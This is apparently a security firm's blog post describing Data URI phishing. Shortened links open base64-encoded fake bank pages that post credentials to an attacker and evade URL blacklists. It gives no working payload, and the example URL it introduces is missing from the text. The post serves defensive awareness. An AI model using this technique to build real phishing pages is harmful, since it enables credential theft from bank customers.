Over time there is a natural tendency towards attack complexity as defensive countermeasures improve. The Easy Solutions DMS team is focused on attack detection and removal on behalf of our clients and we have monitored this trend for years. Recently we’re detected a resurgence in an attack type called “Data URI” phishing.
The attack fits the usual phishing pattern starting with an unsolicited email, although other delivery vehicles work just as well—social media, links left in forums, or within comments. The links require the use of a link shortener such as bit.ly, tinyurl, or Goo.gl from Google.
When a victim clicks on these links, the link shortener translates the short URL to a format that appears to be somewhat unique and relatively obscure to a normal web user:
This URL is actually an implementation of the Data URI specification first standardized by the IETF [https://www.ietf.org/rfc/rfc2397.txt] in 1998 to allow for the inline transmission of various media types via an arbitrary base64 encoded string. This is another example of web browser features designed for good being misappropriated for evil. We have blogged about PAC (proxy autoconfig) attacks previously.
Data URI phishing attacks embed an entire fake phishing page, HTML source code and all into a long base64-encoded string that is rendered by the browser. Interestingly enough, none of the elements on the fake page are hosted on a server owned by the fraudster except for a single URL where credentials are sent via a HTTP POST, but instead they are being taken from the bank’s legitimate website.
These attacks have been reported before, and we believe the first public reference to this attack was published in late 2012 by Henning Klevjer (See it here http://klevjers.com/papers/phishing.pdf). Our DMS team has started to see this attacks target large US banks. The attack is novel and interesting for a few reasons:
- Data URI attacks are relatively easy to scale with the use of free link shortening services
- Data URI attacks are relatively easy to automate
- Data URI attacks are not “hosted” in the typical sense, so they cannot be blacklisted
All of this leads to an effective attack vector that is more resistant to automatic detection and rapid attack deactivation/takedown. We expect that if and when these attacks become more popular against high-profile targets, that the browser vendors will begin to introduce controls to make these attacks less effective. This is easier said than done due to potential adverse consequences in limiting the functionality of standardized Data URI capabilities within modern browsers.
Additionally, if this attack gains widespread acceptance as a phishing attack vector of choice, we expect to see these attacks target enterprise users as part of spear-phishing campaigns. Enterprise users are especially vulnerable to spear phishing and traditional URL-based blacklisting that many enterprise email filtering technologies rely upon are not effective against Data URI attacks.